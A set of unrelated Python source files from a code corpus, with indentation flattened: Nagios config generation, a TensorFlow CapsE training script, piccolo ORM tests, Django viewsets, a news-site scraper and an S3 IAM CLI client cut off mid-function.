cgroup_dict['contactgroup_name'] = cgroup_key
self.write_definition(fhandle, 'contactgroup', cgroup_dict)
i += 1
fhandle.close()
logging.info("Written %i 'contactgroup' definitions.", i)
def write_datacenter_definitions(self):
"""Write definitions for all datacenters."""
dctrs_file = '%s/objects/datacenters.cfg' % (ICINGA_DIR)
dctrs = self.nagios_db['datacenters']
with open(dctrs_file, 'w+') as fhandle:
i = 0
for dctr_key in dctrs.iterkeys():
dct_dict = dctrs[dctr_key]['host'].copy()
dct_dict['host_name'] = dctr_key
self.write_definition(fhandle, 'host', dct_dict)
i += 1
logging.info("Written %i 'datacenter' definitions.", i)
def write_definition(self, fhandle, definition_str, some_dict):
"""Write Nagios definition into given file pointer."""
stuffing_len = 0
dict_keys = some_dict.keys()
dict_keys.sort()
# figure-out padding len
for attribute in dict_keys:
if len(attribute) > stuffing_len:
stuffing_len = len(attribute)
stuffing_len += 1
fhandle.write('define %s {\n' % (definition_str))
for attribute in dict_keys:
padding_len = stuffing_len - len(attribute)
padding = self.get_padding(padding_len)
fhandle.write(' %s%s%s\n' % (attribute, padding,
some_dict[attribute]))
fhandle.write('}\n\n')
def write_hostgroup_definitions(self):
"""Write hostgroup definitions."""
hosts = self.nagios_db['hosts']
hostgroups = self.nagios_db['hostgroups']
for host in hosts.iterkeys():
if 'hostgroups' not in hosts[host]:
continue
for hostgroup in hosts[host]['hostgroups']:
if hostgroup not in hostgroups:
hostgroups[hostgroup] = {}
# add 'members' attribute if hostgroup doesn't have any
if 'members' not in hostgroups[hostgroup]:
hostgroups[hostgroup]['members'] = list()
if host in hostgroups[hostgroup]['members']:
continue
hostgroups[hostgroup]['members'].append(host)
dctrs = self.nagios_db['datacenters']
for dctr in dctrs.iterkeys():
if 'hostgroups' not in dctrs[dctr]:
continue
for hostgroup in dctrs[dctr]['hostgroups']:
if hostgroup not in hostgroups:
hostgroups[hostgroup] = {}
# add 'members' attribute if hostgroup doesn't have any
if 'members' not in hostgroups[hostgroup]:
hostgroups[hostgroup]['members'] = list()
if dctr in hostgroups[hostgroup]['members']:
continue
hostgroups[hostgroup]['members'].append(dctr)
hgroups_file = '%s/objects/hostgroups.cfg' % (ICINGA_DIR)
fhandle = open(hgroups_file, 'w+')
i = 0
for hgrp_key in hostgroups.iterkeys():
hostgroup = hostgroups[hgrp_key]
if 'members' in hostgroup:
if len(hostgroup['members']) < 1:
# I guess Nagios wouldn't like empty members
hostgroup.pop('members')
else:
# Yes, let's change 'list' to 'string' and make it easy on
# printer
hostgroup['members'] = ','.join(hostgroup['members'])
hostgroup['hostgroup_name'] = hgrp_key
self.write_definition(fhandle, 'hostgroup', hostgroup)
i += 1
fhandle.close()
logging.info("Written %i 'hostgroup' definitions.", i)
def write_service_definitions(self):
"""Write service definitons."""
if 'active' not in self.nagios_db['services']:
return
services_file = '%s/objects/services.cfg' % (ICINGA_DIR)
fhandle = open(services_file, 'w+')
i = 0
for svc_key in self.nagios_db['services']['active'].iterkeys():
service = self.nagios_db['services']['active'][svc_key]
service['service_description'] = svc_key
if 'use' not in service:
service['use'] = 'generic-service'
self.write_definition(fhandle, 'service', service)
i += 1
fhandle.close()
logging.info("Written %i 'service' definitions.", i)
def convert_nagios_config():
"""Convert given Nagios config into YAML."""
if len(sys.argv) != 4:
logging.error('Expected %i arguments, %i given.', 3, len(sys.argv) - 1)
sys.exit(1)
nagios_to_yaml = NagiosToYaml()
nagios_to_yaml.parse_nagios_config(sys.argv[2])
nagios_to_yaml.write_to_yaml(sys.argv[3])
def import_remote_config():
"""Imports config sent from Remote Host."""
if len(sys.argv) < 3:
logging.error('Expected %i arguments, %i given.', 2, len(sys.argv) - 1)
sys.exit(1)
cfg_file = sys.argv[2]
config_generator = NagiosConfigGenerator()
retval = config_generator.run(cfg_file)
if retval == True:
logging.info("Will remove '%s'.", cfg_file)
os.remove(cfg_file)
os.remove('%s.ok' % (cfg_file))
print '* run % icinga -v /etc/icinga/icinga.cfg; before reload!'
print "* don't forget to commit your changes"
def main():
"""Main."""
logging.basicConfig(format=LOG_FORMAT)
logging.getLogger().setLevel(logging.INFO)
if len(sys.argv) < 2:
logging.error('Not enough arguments given.')
print_help()
sys.exit(1)
action = sys.argv[1]
if action == 'help':
print_help()
elif action == 'import':
import_remote_config()
elif action == 'regen':
regenerate_nagios_config()
elif action == 'convert':
convert_nagios_config()
else:
logging.error("Invalid parameter '%s'.", action)
sys.exit(1)
def print_help():
"""Print help."""
print '%s <action> [params]' % (sys.argv[0])
print ''
print 'Actions and params:'
print ' convert <src> <tgt> - convert Nagios config(src) to YAML(tgt)'
print ''
print ' import <path_to_cfg> - import configuration from remote Host'
print ''
print "NOTE: It's possible for 'regen' to create inconsistent Nagios"
print ' configuration! Use with care!'
print ' regen <what> - regenerates given definitions'
print ' commands - command definitons'
print ' contacts - contact definitions'
print ' contactgroups - contactgroup definitions'
print ' datacenters - datacenter definitions'
print ' hostgroups - hostgroup definitions'
print ' services - (active) service definitions'
def regenerate_nagios_config():
"""Regenerate part of Nagios config."""
if len(sys.argv) < 3:
logging.error('Expected %i parameters, %i given.', 2, len(sys.argv) - 1)
sys.exit(1)
config_generator = NagiosConfigGenerator()
config_generator.ensure_host_definitions()
what = sys.argv[2]
if what == 'commands':
config_generator.write_command_definitions()
elif what == 'contacts':
config_generator.write_contact_definitions()
elif what == 'contactgroups':
config_generator.write_contactgroup_definitions()
elif what == 'datacenters':
config_generator.write_datacenter_definitions()
elif what == 'hostgroups':
config_generator.write_hostgroup_definitions()
elif what == 'services':
config_generator.write_service_definitions()
else:
logging.error("Unknown parameter '%s'.", what)
sys.exit(1)
if __name__ == '__main__':
main()
| StarcoderdataPython |
1643023 | #! /usr/bin/env python
import tensorflow as tf
import numpy as np
import os
import time
import datetime
from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter
from builddata_ecir import *
from capsuleNet_SEARCH17 import CapsE
np.random.seed(1234)
tf.set_random_seed(1234)
# Parameters
# ==================================================
parser = ArgumentParser("CapsE", formatter_class=ArgumentDefaultsHelpFormatter, conflict_handler='resolve')
parser.add_argument("--data", default="./data/", help="Data sources.")
parser.add_argument("--run_folder", default="./", help="Data sources.")
parser.add_argument("--name", default="SEARCH17", help="Name of the dataset.")
parser.add_argument("--embedding_dim", default=200, type=int, help="Dimensionality of character embedding (fixed: 200)")
parser.add_argument("--filter_size", default=1, type=int, help="Comma-separated filter sizes (default: '3,4,5')")
parser.add_argument("--num_filters", default=400, type=int, help="Number of filters per filter size (default: 128)")
parser.add_argument("--learning_rate", default=0.00001, type=float, help="Learning rate")
parser.add_argument("--batch_size", default=128, type=int, help="Batch Size")
parser.add_argument("--neg_ratio", default=1.0, help="Number of negative triples generated by positive (default: 1.0)")
parser.add_argument("--useInitialization", default=True, type=bool, help="Using the pretrained embeddings")
parser.add_argument("--num_epochs", default=100, type=int, help="Number of training epochs")
parser.add_argument("--savedEpochs", default=10, type=int, help="")
parser.add_argument("--allow_soft_placement", default=True, type=bool, help="Allow device soft device placement")
parser.add_argument("--log_device_placement", default=False, type=bool, help="Log placement of ops on devices")
parser.add_argument("--model_name", default='search17model', help="")
parser.add_argument("--useConstantInit", action='store_true')
parser.add_argument('--iter_routing', default=1, type=int, help='number of iterations in routing algorithm')
parser.add_argument('--num_outputs_secondCaps', default=1, type=int, help='')
parser.add_argument('--vec_len_secondCaps', default=10, type=int, help='')
args = parser.parse_args()
print(args)
# Load data
# Load data
print("Loading data...")
train_triples, train_rank_triples, train_val_triples, valid_triples, valid_rank_triples, valid_val_triples, \
test_triples, test_rank_triples, test_val_triples, query_indexes, user_indexes, doc_indexes, \
indexes_query, indexes_user, indexes_doc = build_data_ecir()
data_size = len(train_triples)
train_batch = Batch_Loader_ecir(train_triples, train_val_triples, batch_size=args.batch_size)
assert args.embedding_dim % 200 == 0
pretrained_query = init_dataset_ecir(args.data + args.name + '/query2vec.200.init')
pretrained_user = init_dataset_ecir(args.data + args.name + '/user2vec.200.init')
pretrained_doc = init_dataset_ecir(args.data + args.name + '/doc2vec.200.init')
print("Using pre-trained initialization.")
lstEmbedQuery = assignEmbeddings(pretrained_query, query_indexes)
lstEmbedUser = assignEmbeddings(pretrained_user, user_indexes)
lstEmbedDoc = assignEmbeddings(pretrained_doc, doc_indexes)
lstEmbedQuery = np.array(lstEmbedQuery, dtype=np.float32)
lstEmbedUser = np.array(lstEmbedUser, dtype=np.float32)
lstEmbedDoc = np.array(lstEmbedDoc, dtype=np.float32)
print("Loading data... finished!")
# Training
# ==================================================
with tf.Graph().as_default():
session_conf = tf.ConfigProto(allow_soft_placement=args.allow_soft_placement, log_device_placement=args.log_device_placement)
session_conf.gpu_options.allow_growth = True
sess = tf.Session(config=session_conf)
with sess.as_default():
global_step = tf.Variable(0, name="global_step", trainable=False)
capse = CapsE(sequence_length=3,
batch_size=20 * args.batch_size,
initialization=[lstEmbedQuery, lstEmbedUser, lstEmbedDoc],
embedding_size=200,
filter_size=args.filter_size,
num_filters=args.num_filters,
iter_routing=args.iter_routing,
num_outputs_secondCaps=args.num_outputs_secondCaps,
vec_len_secondCaps=args.vec_len_secondCaps,
useConstantInit=args.useConstantInit
)
# Define Training procedure
#optimizer = tf.contrib.opt.NadamOptimizer(1e-3)
optimizer = tf.train.AdamOptimizer(learning_rate=args.learning_rate)
#optimizer = tf.train.RMSPropOptimizer(learning_rate=args.learning_rate)
#optimizer = tf.train.GradientDescentOptimizer(learning_rate=args.learning_rate)
grads_and_vars = optimizer.compute_gradients(capse.total_loss)
train_op = optimizer.apply_gradients(grads_and_vars, global_step=global_step)
out_dir = os.path.abspath(os.path.join(args.run_folder, "runs_CapsE_SEARCH17", args.model_name))
print("Writing to {}\n".format(out_dir))
checkpoint_dir = os.path.abspath(os.path.join(out_dir, "checkpoints"))
checkpoint_prefix = os.path.join(checkpoint_dir, "model")
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
# Initialize all variables
sess.run(tf.global_variables_initializer())
def train_step(x_batch, y_batch):
"""
A single training step
"""
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch
}
_, step, loss = sess.run([train_op, global_step, capse.total_loss], feed_dict)
return loss
# Predict function to predict scores for test data
def predict(x_batch, y_batch):
feed_dict = {
capse.input_x: x_batch,
capse.input_y: y_batch,
capse.dropout_keep_prob: 1.0
}
scores = sess.run([capse.predictions], feed_dict)
return scores
def test_prediction(x_batch, y_batch, lstOriginalRank):
new_x_batch = np.concatenate(x_batch)
new_y_batch = np.concatenate(y_batch, axis=0)
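# Pad with copies of the last example so the total divides evenly into fixed-size prediction batches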
while len(new_x_batch) % (args.batch_size * 20) != 0:
new_x_batch = np.append(new_x_batch, np.array([new_x_batch[-1]]), axis=0)
new_y_batch = np.append(new_y_batch, np.array([new_y_batch[-1]]), axis=0)
results = []
listIndexes = range(0, len(new_x_batch), 20 * args.batch_size)
for tmpIndex in range(len(listIndexes) - 1):
results = np.append(results,
predict(new_x_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]],
new_y_batch[listIndexes[tmpIndex]:listIndexes[tmpIndex + 1]]))
results = np.append(results,
predict(new_x_batch[listIndexes[-1]:], new_y_batch[listIndexes[-1]:]))
lstresults = []
_start = 0
for tmp in lstOriginalRank:
_end = _start + len(tmp)
lstsorted = np.argsort(results[_start:_end])
lstresults.append(np.where(lstsorted == 0)[0] + 1)
_start = _end
return lstresults
wri = open(checkpoint_prefix + '.cls.' + '.txt', 'w')
lstvalid_mrr = []
lsttest_mrr = []
num_batches_per_epoch = int((data_size - 1) / (args.batch_size)) + 1
for epoch in range(args.num_epochs):
for batch_num in range(num_batches_per_epoch):
x_batch, y_batch = train_batch()
train_step(x_batch, y_batch)
current_step = tf.train.global_step(sess, global_step)
valid_results = test_prediction(valid_triples, valid_val_triples, valid_rank_triples)
test_results = test_prediction(test_triples, test_val_triples, test_rank_triples)
valid_mrr = computeMRR(valid_results)
test_mrr = computeMRR(test_results)
test_p1 = computeP1(test_results)
lstvalid_mrr.append(valid_mrr)
lsttest_mrr.append([test_mrr, test_p1])
wri.write("epoch " + str(epoch) + ": " + str(valid_mrr) + " " + str(test_mrr) + " " + str(test_p1) + "\n")
index_valid_max = np.argmax(lstvalid_mrr)
wri.write("\n--------------------------\n")
wri.write("\nBest mrr in valid at epoch " + str(index_valid_max) + ": " + str(lstvalid_mrr[index_valid_max]) + "\n")
wri.write("\nMRR and P1 in test: " + str(lsttest_mrr[index_valid_max][0]) + " " + str(lsttest_mrr[index_valid_max][1]) + "\n")
wri.close()
| StarcoderdataPython |
3363506 | <reponame>epfl-dcsl/ptf-persona<filename>app/simple.py
# Copyright 2019 École Polytechnique <NAME>. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
from app import app
from modules.simple import stage as simple_stage
from common.parse import numeric_min_checker
import itertools
import logging
logging.basicConfig(level=logging.DEBUG)
import tensorflow as tf
import tensorflow.contrib.gate as gate
class Simple(app.Application):
app_dtypes = (tf.int32,)
app_shapes = ((),)
log = logging.getLogger("Simple")
log.setLevel(level=logging.DEBUG) # don't know why basicConfig() isn't doing this
@staticmethod
def name():
return "simple"
@staticmethod
def help_message():
return "run a simple increment app"
@classmethod
def device_counts(cls, args):
return { "": args.stages }
@classmethod
def _make_graph_args(cls, parser):
simple_stage.Incrementer.add_graph_args(parser=parser)
parser.add_argument("--stages", default=1, type=numeric_min_checker(minimum=1, message="need at least one stage!"), help="number of stages to run in parallel")
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
capacity_between_gates = int(num_client_slots*1.5)
ingress = gate.IngressGate(dtypes=self.app_dtypes, shapes=self.app_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
stages = tuple(simple_stage.Incrementer(args=args) for _ in range(args.stages))
devices = device_map[""]
assert len(devices) == len(stages)
def make_outputs():
for device, stage in zip(devices, stages):
with device:
yield stage.make_graph(upstream_gate=ingress)
outputs = tuple(make_outputs())
example_output = outputs[0]
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output[1:], id_and_count_upstream=example_output[0], join=True,
name="egress_gate")
enqueue_ops = tuple(egress.enqueue(id_and_count=a[0], components=a[1:]) for a in outputs)
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops,
device=egress.device)) # ideally, each local device would run its own gate runner, but we're running everything locally to make it easy
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.app_shapes)
for _ in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape) for dtype, shape in zip(self.app_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders)
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue)
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
parser.add_argument("numbers", nargs="+", type=int, help="integers to increment in this pipeline")
@classmethod
def process_ingress_args(cls, args):
return args.numbers
@classmethod
def process_egress_results(cls, results, args):
cls.log.info("Got results: {}".format(results))
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
a = sess.run(egress_dequeue, feed_dict={ingress_placeholder: client_args})
return tuple(itertools.chain.from_iterable(a[0].tolist())) #flattens it out to (0,1,2) instead of ((0),(1),(2))
def stop(self, sess):
sess.run(self.close_op)
| StarcoderdataPython |
1709088 | # -*- coding: utf-8 -*-
import requests
from bs4 import BeautifulSoup
import lxml
import json
import time
from random import randrange
FILE = 'ParseResults.csv'
HOST = 'https://www.citilink.ru/catalog/smartfony/'
headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/'
'537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.50',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image'
'/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
def get_article_urls(url):
s = requests.Session()
response = s.get(url=url, headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
pagination_count = int(soup.find('span', class_='navigations').find_all('a')[-1].text)
articles_urls_list = []
for page in range(1, pagination_count + 1):
response = s.get(url=f'https://hi-tech.news/page/{page}/', headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
articles_urls = soup.find_all('a', 'post-title-a')
for au in articles_urls:
art_url = au.get('href')
articles_urls_list.append(art_url)
time.sleep(randrange(2, 5))
print(f'Processed page {page} of {pagination_count}')
with open('articles_urls.txt', 'w') as file:
for url in articles_urls_list:
file.write(f'{url}\n')
return 'Finished collecting article links'
def get_data(file_path):
with open(file_path) as file:
urls_list = [line.strip() for line in file.readlines()]
urls_count = len(urls_list)
s = requests.Session()
result_data = []
for url in enumerate(urls_list):
response = s.get(url=url[1], headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
article_title = soup.find('div', class_='post-content').find('h1', class_='title').text.strip()
article_data = soup.find('div', class_='post').find('div', class_='tile-views').text.strip()
article_img = f"https://hi-tech.news{soup.find('div', class_='post-media-full').find('img').get('src')}"
article_text = soup.find('div', class_='the-excerpt').text.strip().replace('\n', '')
result_data.append({
'Original_url': url[1],
'Title': article_title,
'Data': article_data,
'Img': article_img,
'Article_Text': article_text,
})
# print(f'{article_title}\n{article_data}\n{article_img}\n')
time.sleep(randrange(1, 2))
print(f'Processed {url[0]+1}/{urls_count}')
with open('result.json', 'w', encoding='utf-8') as file:
json.dump(result_data, file, indent=4, ensure_ascii=False)
def main():
# print(get_article_urls(url='https://hi-tech.news'))
get_data('articles_urls.txt')
if __name__ == '__main__':
main()
| StarcoderdataPython |
3283558 | from unittest import TestCase
from piccolo.apps.user.tables import BaseUser
from piccolo.conf.apps import AppRegistry, AppConfig, table_finder
from ..example_app.tables import Manager
class TestAppRegistry(TestCase):
def test_get_app_config(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
app_config = app_registry.get_app_config(app_name="user")
self.assertTrue(isinstance(app_config, AppConfig))
def test_get_table_classes(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
table_classes = app_registry.get_table_classes(app_name="user")
self.assertTrue(BaseUser in table_classes)
with self.assertRaises(ValueError):
app_registry.get_table_classes(app_name="Foo")
def test_duplicate_app_names(self):
"""
An exception should be raised if apps with duplicate names are registered.
"""
with self.assertRaises(ValueError):
AppRegistry(
apps=[
"piccolo.apps.user.piccolo_app",
"piccolo.apps.user.piccolo_app",
]
)
def test_get_table_with_name(self):
app_registry = AppRegistry(apps=["piccolo.apps.user.piccolo_app"])
table = app_registry.get_table_with_name(
app_name="user", table_class_name="BaseUser"
)
self.assertEqual(table, BaseUser)
class TestAppConfig(TestCase):
def test_get_table_with_name(self):
"""
Register a table, then test retrieving it.
"""
config = AppConfig(app_name="Music", migrations_folder_path="")
config.register_table(table_class=Manager)
self.assertEqual(config.get_table_with_name("Manager"), Manager)
with self.assertRaises(ValueError):
config.get_table_with_name("Foo")
class TestTableFinder(TestCase):
def test_table_finder(self):
"""
Should return all Table subclasses.
"""
tables = table_finder(modules=["tests.example_app.tables"])
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Poster", "Ticket", "Venue"],
)
with self.assertRaises(ImportError):
table_finder(modules=["foo.bar.baz"])
def test_table_finder_coercion(self):
"""
Should convert a string argument to a list.
"""
tables = table_finder(modules="tests.example_app.tables")
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Poster", "Ticket", "Venue"],
)
def test_include_tags(self):
"""
Should return all Table subclasses with a matching tag.
"""
tables = table_finder(
modules=["tests.example_app.tables"], include_tags=["special"]
)
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names, ["Poster"],
)
def test_exclude_tags(self):
"""
Should return all Table subclasses without the specified tags.
"""
tables = table_finder(
modules=["tests.example_app.tables"], exclude_tags=["special"]
)
table_class_names = [i.__name__ for i in tables]
table_class_names.sort()
self.assertEqual(
table_class_names,
["Band", "Concert", "Manager", "Ticket", "Venue"],
)
| StarcoderdataPython |
3267824 | <filename>LeetCode_easy/1-bit&2-bitCharacters_717.py
# -*- coding: utf-8 -*-
'''
717. 1-bit and 2-bit Characters
We have two special characters. The first character can be represented by one bit 0. The second character can be represented by two bits (10 or 11).
Now given a string represented by several bits. Return whether the last character must be a one-bit character or not. The given string will always end with a zero.
Example 1:
Input:
bits = [1, 0, 0]
Output: True
Explanation:
The only way to decode it is two-bit character and one-bit character. So the last character is one-bit character.
Example 2:
Input:
bits = [1, 1, 1, 0]
Output: False
Explanation:
The only way to decode it is two-bit character and two-bit character. So the last character is NOT one-bit character.
Note:
1 <= len(bits) <= 1000.
bits[i] is always 0 or 1.
'''
class Solution():
# Per the problem statement, the only valid tokens are 0, 10 and 11, and the last bit is always 0
# Scan up to the second-to-last position (the last bit must be 0): advance j by 1 on a 0 and by 2 on a 1; the answer is whether j ends exactly at len(nums)-1
def is_one_bit_character(self,nums):
j = 0
nums_size = len(nums)
while j < nums_size-1:
j = j + 1 if nums[j] == 0 else j + 2
# print(j)
return j == nums_size-1
if __name__ == "__main__":
input = [1, 1, 1, 0]
solution=Solution()
result = solution.is_one_bit_character(input)
print(result)
# Example of generating a random 0-1 array of length n:
import random
n = 10
list = [random.randint(0,1) for i in range(n-1)]
list.append(0)
print(list)
| StarcoderdataPython |
3238233 | from django.contrib.auth.models import User, Group
from restapp.models import Character
from rest_framework import viewsets
from restapp.serializers import UserSerializer, GroupSerializer, CharacterSerializer
from rest_framework.permissions import IsAuthenticatedOrReadOnly, IsAuthenticated
from django.shortcuts import render
from django.utils import timezone
from django.views import generic
class UserViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
"""
API endpoint that allows users to be viewed or edited.
"""
queryset = User.objects.all().order_by('-date_joined')
serializer_class = UserSerializer
class GroupViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticated,)
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Group.objects.all()
serializer_class = GroupSerializer
class CharacterViewSet(viewsets.ModelViewSet):
permission_classes = (IsAuthenticatedOrReadOnly,)
"""
API endpoint that allows groups to be viewed or edited.
"""
queryset = Character.objects.all()
serializer_class = CharacterSerializer
def home_page(request):
# posts = Post.objects.filter(published_date__lte=timezone.now()).order_by('published_date')
return render(request, 'restapp/index.html', {'data': " "})
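# Typical wiring for these viewsets (a sketch only; this normally lives in urls.py and
# the route prefixes below are illustrative):
#
#   from rest_framework import routers
#   router = routers.DefaultRouter()
#   router.register(r'users', UserViewSet)
#   router.register(r'groups', GroupViewSet)
#   router.register(r'characters', CharacterViewSet)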
| StarcoderdataPython |
1636057 | <gh_stars>10-100
# -*- coding: utf-8 -*-
import configparser
import os
cfile = os.path.join(os.path.dirname(__file__), 'config.ini')
cfg = configparser.ConfigParser()
cfg.read(cfile)
if not cfg.has_section('API'):
    raise Exception('Config File was not read.')
def get_urlroot():
urlroot = cfg['API']['url_root']
return urlroot
def get_urlrootfmp():
urlrootfmp = cfg['API']['url_root_fmp']
return urlrootfmp
def get_apikey():
apikey = cfg['API']['api_key']
return apikey
def set_apikey(apikey):
cfg['API']['api_key'] = apikey
with open(cfile, 'w') as configfile:
cfg.write(configfile)
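# Example usage (sketch; the key value is a placeholder):
#   set_apikey("YOUR_API_KEY")   # persists the key back to config.ini
#   root = get_urlroot()         # base URL read from the [API] section
#   key = get_apikey()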
| StarcoderdataPython |
4801058 | <reponame>dan-fritchman/Hdl21<filename>scratch/diff.py
"""
# Hdl21 Differential Bundle and Facilities for Differential Circuits
"""
from typing import Any, Dict
from pydantic.dataclasses import dataclass
# Local imports
from .signal import Signal
from .bundle import bundle
from .instantiable import Instantiable
@bundle
class DiffSomething:
""" Differential Bundle """
p = Signal(width=1, desc="Positive")
n = Signal(width=1, desc="Negative")
@dataclass
class DiffSomethingElse:
""" Differential Instance Bundle """
of: Instantiable # Target Module
conns: Dict[str, Any] # Really [str, Connectable]
def diff_inst(of: Instantiable) -> DiffSomethingElse:
""" Create a Differential Instance Bundle """
return DiffSomethingElse(of=of, conns={})
| StarcoderdataPython |
3375465 | <filename>auth-utils/s3iamcli/s3iamcli/accountloginprofile.py<gh_stars>10-100
#
# Copyright (c) 2020 Seagate Technology LLC and/or its Affiliates
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# For any questions about this software or licensing,
# please email <EMAIL> or <EMAIL>.
#
import http.client, urllib.parse
import sys
import datetime
from s3iamcli.util import sign_request_v2
from s3iamcli.util import sign_request_v4
from s3iamcli.util import get_timestamp
from s3iamcli.conn_manager import ConnMan
from s3iamcli.error_response import ErrorResponse
from s3iamcli.create_accountloginprofile_response import CreateAccountLoginProfileResponse
from s3iamcli.get_accountloginprofile_response import GetAccountLoginProfileResponse
from s3iamcli.list_account_response import ListAccountResponse
from s3iamcli.reset_key_response import ResetAccountAccessKey
from s3iamcli.config import Config
from s3iamcli.cli_response import CLIResponse
class AccountLoginProfile:
def __init__(self, iam_client, cli_args):
self.iam_client = iam_client
self.cli_args = cli_args
    # get the login profile for an account
def list(self):
# Get host value from url https://iam.seagate.com:9443
if(self.cli_args.name is None):
message = "Account name is required."
CLIResponse.send_error_out(message)
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
body = urllib.parse.urlencode({'Action' : 'GetAccountLoginProfile','AccountName' : self.cli_args.name})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t,
url_parse_result.netloc, Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(self.cli_args.session_token is not None):
headers['X-Amz-Security-Token'] = self.cli_args.session_token;
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
response = ConnMan.send_post_request(body, headers)
if response['status'] == 200:
accounts = GetAccountLoginProfileResponse(response)
if accounts.is_valid_response():
accounts.print_account_login_profile_info()
else:
# unlikely message corruption case in network
message = "Failed to list login profile"
CLIResponse.send_success_out(message)
elif(response['status'] == 503):
message = "Failed to get login profile\n" \
"An error occurred (503) when calling the GetAccountLoginProfile operation : " + response['reason']
CLIResponse.send_error_out(message)
else:
message = "Failed to get login profile\n"
error = ErrorResponse(response)
message += error.get_error_message()
CLIResponse.send_error_out(message)
def create(self):
if(self.cli_args.name is None or self.cli_args.name is ''):
message = "Account name is required"
CLIResponse.send_error_out(message)
if(self.cli_args.password is None):
message = "Account login password is required"
CLIResponse.send_error_out(message)
passwordResetRequired = False;
if(self.cli_args.password_reset_required):
passwordResetRequired = True
# Get host value from url https://iam.seagate.com:9443
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
body = urllib.parse.urlencode({'Action' : 'CreateAccountLoginProfile',
'AccountName' : self.cli_args.name, 'Password' : self.cli_args.password,
            'PasswordResetRequired' : passwordResetRequired})
headers = {'content-type': 'application/x-www-form-urlencoded',
'Accept': 'text/plain'}
headers['Authorization'] = sign_request_v4('POST', '/', body, epoch_t, url_parse_result.netloc,
Config.service, Config.default_region);
headers['X-Amz-Date'] = get_timestamp(epoch_t);
if(headers['Authorization'] is None):
message = "Failed to generate v4 signature"
CLIResponse.send_error_out(message)
result = ConnMan.send_post_request(body, headers)
# Validate response
if(result['status'] == 201):
profile = CreateAccountLoginProfileResponse(result)
if profile.is_valid_response():
profile.print_profile_info()
else:
# unlikely message corruption case in network
message = "Account login profile was created. For details try get account login profile."
CLIResponse.send_success_out(message)
elif(result['status'] == 503):
message = "Failed to create Account login profile.\n" \
"An error occurred (503) when calling the CreateAccountLoginProfile operation : " + result['reason']
CLIResponse.send_error_out(message)
else:
message = "Failed to create Account login profile.\n"
error = ErrorResponse(result)
message += error.get_error_message()
CLIResponse.send_error_out(message)
def update(self):
if(self.cli_args.name is None):
message = "Account name is required for UpdateAccountLoginProfile"
CLIResponse.send_error_out(message)
passwordResetRequired = False
if(self.cli_args.password_reset_required):
passwordResetRequired = True
if(self.cli_args.password is None) and (self.cli_args.password_reset_required is False) and (self.cli_args.no_password_reset_required is False):
message = "Please provide password or password-reset flag"
CLIResponse.send_error_out(message)
# Get host value from url https://iam.seagate.com:9443
url_parse_result = urllib.parse.urlparse(Config.endpoint)
epoch_t = datetime.datetime.utcnow();
if(self.cli_args.password is None):
body = urllib.parse.urlencode({'Action' : 'UpdateAccountLoginProfile',
'AccountName' : self.cli_args.name, 'PasswordResetRequired' : passwordResetRequired})
else:
body = urllib.parse.urlencode({'Action' : 'UpdateAccountLoginProfile',
